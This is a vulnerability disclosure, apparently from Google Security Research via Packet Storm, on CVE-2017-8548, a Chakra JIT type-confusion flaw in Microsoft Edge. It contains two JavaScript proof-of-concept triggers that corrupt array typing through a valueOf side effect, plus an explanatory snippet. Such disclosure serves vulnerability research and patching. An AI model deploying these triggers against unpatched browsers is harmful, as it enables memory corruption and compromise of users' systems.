Packet Storm ID: PACKETSTORM:143795

Microsoft Edge Chakra Incorrect Jit Optimization

2017-08-16 00:00:00
Google Security Research
packetstormsecurity.com

EPSS: 0.945 (High), percentile 99.0%

Microsoft Edge: Chakra: incorrect jit optimization with TypedArray setter #2  
  
CVE-2017-8548  
  
  
I think the fix for #1045 is incorrect.  
  
Here's the original PoC.

```javascript
'use strict';

function func(a, b, c) {
  a[0] = 1.2;
  b[0] = c;            // typed-array store: ToNumber(c) runs c.valueOf() as a side effect
  a[1] = 2.2;
  a[0] = 2.3023e-320;  // optimized code still treats a as a float array after the store
}

function main() {
  var a = [1.1, 2.2];
  var b = new Uint32Array(100);

  // force to optimize
  for (var i = 0; i < 0x10000; i++)
    func(a, b, i);

  func(a, b, {valueOf: () => {
    a[0] = {};  // side effect during the store: a no longer holds only floats

    return 0;
  }});

  a[0].toString();
}

main();
```
  
  
I just changed "var b = new Uint32Array(100);" to "var b = new Uint32Array(0);", and it worked well.  
  
PoC:

```javascript
'use strict';

function func(a, b, c) {
  a[0] = 1.2;
  b[0] = c;            // out-of-bounds store on a zero-length array: ToNumber(c) still runs
  a[1] = 2.2;
  a[0] = 2.3023e-320;
}

function main() {
  var a = [1.1, 2.2];
  var b = new Uint32Array(0); // <<--------- 100 -> 0

  // force to optimize
  for (var i = 0; i < 0x10000; i++)
    func(a, b, i);

  func(a, b, {valueOf: () => {
    a[0] = {};

    return 0;
  }});

  a[0].toString();
}

main();
```
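The difference between the two PoCs comes down to evaluation order in the typed-array element store. As an added example (not part of the original report), this Node.js snippet shows that ToNumber on the stored value, and therefore `valueOf`, runs before the index is bounds-checked, so the side effect on `a` happens with a length-0 `Uint32Array` exactly as with a length-100 one; an optimizer that treats an out-of-bounds typed-array store as side-effect free misses it.

```javascript
'use strict';

// Added example: records the order of events around a typed-array store and
// whether the side effect inside valueOf() was observed, for a given length.
function typedArrayStoreSideEffects(length) {
  const a = [1.1, 2.2];              // a float array, like `a` in the PoC
  const b = new Uint32Array(length); // 100 (in bounds) or 0 (out of bounds)
  const trace = [];

  const c = {
    valueOf() {
      trace.push('valueOf');
      a[0] = {};                     // side effect: a's element kind changes
      return 7;
    },
  };

  trace.push('before-store');
  b[0] = c;                          // ToNumber(c) is evaluated here, in or out of bounds
  trace.push('after-store');

  return {
    length,
    order: trace,
    valueOfCalled: trace.includes('valueOf'),
    stored: length > 0 ? b[0] : undefined, // the write itself is dropped when out of bounds
    aZeroIsObject: typeof a[0] === 'object' && a[0] !== null,
  };
}

// Constructed inputs mirroring the two PoCs.
const inBounds = typedArrayStoreSideEffects(100);
const outOfBounds = typedArrayStoreSideEffects(0);
console.log(inBounds.order, inBounds.stored, inBounds.aZeroIsObject);
console.log(outOfBounds.order, outOfBounds.stored, outOfBounds.aZeroIsObject);
```

Both calls report `valueOf` between `before-store` and `after-store`, and in both `a[0]` is an object afterwards; only the stored value differs.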
  
This bug is subject to a 90 day disclosure deadline. After 90 days elapse  
or a patch has been made broadly available, the bug report will become  
visible to the public.  
  
Found by: lokihardt  
  